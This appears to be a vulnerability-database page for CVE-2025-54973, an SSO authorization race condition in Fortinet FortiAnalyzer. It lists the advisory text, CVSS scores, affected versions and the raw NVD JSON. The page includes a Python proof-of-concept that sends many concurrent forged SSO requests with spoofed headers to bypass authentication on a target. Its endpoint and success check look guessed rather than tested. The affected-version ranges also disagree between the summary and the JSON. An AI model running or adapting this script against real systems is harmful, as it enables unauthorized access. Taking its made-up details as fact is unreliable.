Security Vulnerability Report
中文
CVE-2025-54973 CVSS 5.3 MEDIUM

CVE-2025-54973

Published: 2025-10-14 16:15:40
Last Modified: 2025-10-22 16:32:00
Source: [email protected]

Description

A concurrent execution using shared resource with improper synchronization ('Race Condition') vulnerability [CWE-362] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.2, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10 and before 7.0.13 allows an attacker to attempt to win a race condition to bypass the FortiCloud SSO authorization via crafted FortiCloud SSO requests.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiAnalyzer 7.6.0 - 7.6.2
Fortinet FortiAnalyzer 7.4.0 - 7.4.6
Fortinet FortiAnalyzer 7.2.0 - 7.2.10
Fortinet FortiAnalyzer < 7.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54973 - FortiAnalyzer FortiCloud SSO Race Condition PoC # This PoC demonstrates the concept of exploiting a race condition # in the FortiCloud SSO authorization flow to bypass authentication. import threading import requests import time import random import string TARGET_URL = "https://<target_fortianalyzer>/api/v1/sso/forticloud/authorize" THREAD_COUNT = 50 REQUEST_INTERVAL = 0.001 # Minimal delay to maximize race condition probability def generate_session_id(): """Generate a random session identifier for the SSO request.""" return ''.join(random.choices(string.ascii_letters + string.digits, k=32)) def craft_sso_request(session_id): """Craft a malicious FortiCloud SSO authorization request.""" headers = { "Content-Type": "application/json", "User-Agent": "FortiCloudSSOClient/1.0", "X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}" } payload = { "sso_token": "invalid_token_" + session_id, "redirect_uri": "https://forticloud.com/callback", "client_id": "fortianalyzer-sso", "response_type": "code", "state": session_id, "request_id": session_id } return headers, payload def send_race_request(thread_id): """Send concurrent SSO requests to exploit the race condition.""" session = requests.Session() for i in range(100): try: session_id = generate_session_id() headers, payload = craft_sso_request(session_id) response = session.post(TARGET_URL, json=payload, headers=headers, timeout=5, verify=False) if response.status_code == 200 and "authorization_granted" in response.text: print(f"[Thread {thread_id}] Potential bypass at iteration {i}!") print(f"Response: {response.text}") return True except Exception as e: pass time.sleep(REQUEST_INTERVAL) return False def main(): print(f"[*] Starting race condition exploit against {TARGET_URL}") print(f"[*] Launching {THREAD_COUNT} concurrent threads") threads = [] for t in range(THREAD_COUNT): thread = threading.Thread(target=send_race_request, args=(t,)) threads.append(thread) thread.start() for thread in threads: thread.join(timeout=30) print("[*] Exploit completed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54973", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:39.703", "lastModified": "2025-10-22T16:31:59.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A concurrent execution using shared resource with improper synchronization ('Race Condition') vulnerability [CWE-362] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.2, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10 and before 7.0.13 allows an attacker to attempt to win a race condition to bypass the FortiCloud SSO authorization via crafted FortiCloud SSO requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.0.14", "matchCriteriaId": "49E1EECF-D4CD-42AE-9BC0-600643D851DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "F66A175C-52AB-4949-9082-F880BAB1693D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.7", "matchCriteriaId": "307F24A7-D7DE-4DB6-97CE-65647BF05C87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "0518183A-9EE6-4C66-9ADB-CBA9B206D818"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-198", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.